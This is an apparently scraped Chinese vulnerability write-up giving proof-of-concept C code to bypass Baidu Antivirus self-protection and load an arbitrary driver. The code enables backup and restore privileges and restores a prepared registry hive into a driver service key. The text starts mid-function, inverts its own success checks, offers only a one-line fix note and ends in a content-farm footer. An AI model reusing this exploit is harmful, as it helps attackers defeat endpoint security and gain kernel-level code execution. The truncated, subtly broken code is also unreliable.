再再绕百度杀毒任意加载驱动(POC)

TOKEN_QUERY,&hToken))break;if(!LookupPrivilegeValue(NULL,lpName,&luid))break;tp.PrivilegeCount = 1;tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;tp.Privileges[0].Luid = luid;bRet = AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);}while(FALSE);if(hToken != NULL)CloseHandle(hToken);return bRet;}BOOL DumpReg(HKEY hKey,LPCSTR lpSubKey,TCHAR szFilePath[MAX_PATH]){BOOL bRet = FALSE;HKEY hCur = NULL;do{if(!EnableDebugPriv(SE_BACKUP_NAME))break;if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS)break;if(RegSaveKey(hCur,szFilePath,NULL) != ERROR_SUCCESS)bRet = TRUE;}while(FALSE);if(hCur)RegCloseKey(hCur);return bRet;}BOOL RestoreReg(HKEY hKey,LPCSTR lpSubKey,TCHAR szFilePath[MAX_PATH]){BOOL bRet = FALSE;HKEY hCur = NULL;do{if(!EnableDebugPriv(SE_RESTORE_NAME))break;if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS &&RegCreateKey(hKey,lpSubKey,&hCur) != ERROR_SUCCESS)break;if(RegRestoreKey(hCur,szFilePath,REG_FORCE_RESTORE) != ERROR_SUCCESS)bRet = TRUE;}while(FALSE);if(hCur)RegCloseKey(hCur);return bRet;}int main(int argc, char* argv[]){//先本地构造生成一个poc hiv文件// DumpReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\poc","C:\\poc.hiv");//远程饶过写注册表加载驱动RestoreReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\poc","C:\\poc.hiv");return 0;}

 

 修复方案：牺牲点用户体验吧就爱阅读www.92to.com网友整理上传,为您提供最全的知识大全,期待您的分享，转载请注明出处。